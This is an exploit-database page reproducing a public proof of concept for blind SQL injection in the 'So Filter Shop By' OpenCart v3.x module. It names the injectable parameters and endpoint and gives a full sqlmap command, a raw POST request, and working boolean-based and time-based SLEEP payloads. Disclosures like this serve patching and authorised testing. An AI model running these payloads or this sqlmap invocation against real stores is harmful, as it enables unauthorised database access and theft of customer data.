Advertisement






OpenCart v3.x So Filter Shop By - Blind SQL Injection

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022060082

Below is a copy:

OpenCart v3.x So Filter Shop By - Blind SQL Injection
# Exploit Title: OpenCart v3.x So Filter Shop By - Blind SQL Injection
# Date: 28/06/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://codecanyon.net/item/so-filter-shop-by-responsive-opencart-module/13945633
# Version: V3.X
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz


* Description :

So Filter Shop By Module is compatible with any Opencart allows SQL Injection via parameter 'att_value_id , manu_value_id , opt_value_id , subcate_value_id ' in /index.php?route=extension/module/so_filter_shop_by/filter_data. 
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.


* Sqlmap command :

sqlmap -u 'http://127.0.0.1/index.php?route=extension/module/so_filter_shop_by/filter_data' --data "att_value_id=saud&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70%2C72%2C75%2C74%2C73%2C71&product_id_in=70%2C72%2C75%2C74%2C73%2C71&subcate_value_id=&text_search=saud" -p "att_value_id" --method POST --level=5 --risk=3 --dbs --random-agent

Request :

===========

POST /index.php?route=extension/module/so_filter_shop_by/filter_data HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 29
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: Keep-alive

att_value_id=1&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70%2C72%2C75%2C74%2C73%2C71&product_id_in=70%2C72%2C75%2C74%2C73%2C71&subcate_value_id=&text_search=saud


===========

Output :

Parameter: att_value_id (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: att_value_id=-7402) OR 6808=6808 AND (4992=4992&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70,72,75,74,73,71&product_id_in=70,72,75,74,73,71&subcate_value_id=&text_search=saud

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: att_value_id=1) AND (SELECT 6365 FROM (SELECT(SLEEP(5)))qqBP) AND (7704=7704&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70,72,75,74,73,71&product_id_in=70,72,75,74,73,71&subcate_value_id=&text_search=saud

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum